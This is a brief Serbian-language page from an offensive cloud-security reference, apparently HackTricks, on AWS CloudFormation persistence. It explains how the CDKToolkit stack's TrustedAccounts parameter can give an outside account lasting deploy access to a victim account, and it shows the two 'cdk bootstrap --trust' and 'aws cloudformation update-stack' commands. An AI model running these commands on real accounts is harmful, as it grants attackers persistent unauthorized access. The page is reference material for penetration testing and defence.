Files

875 B

AWS - Cloudformation Persistence

{{#include ../../../../banners/hacktricks-training.md}}

CloudFormation

Za više informacija pogledajte:

{{#ref}} ../../aws-services/aws-cloudformation-and-codestar-enum.md {{#endref}}

CDK Bootstrap Stack

AWS CDK raspoređuje CFN stack pod nazivom CDKToolkit. Ovaj stack podržava parametar TrustedAccounts koji omogućava spoljnim nalozima da raspoređuju CDK projekte u nalog žrtve. Napadač može zloupotrebiti ovo kako bi sebi obezbedio trajan pristup nalogu žrtve, bilo korišćenjem AWS cli za ponovno raspoređivanje stack-a sa parametrima, bilo korišćenjem AWS CDK cli.

# CDK
cdk bootstrap --trust 1234567890

# AWS CLI
aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890

{{#include ../../../../banners/hacktricks-training.md}}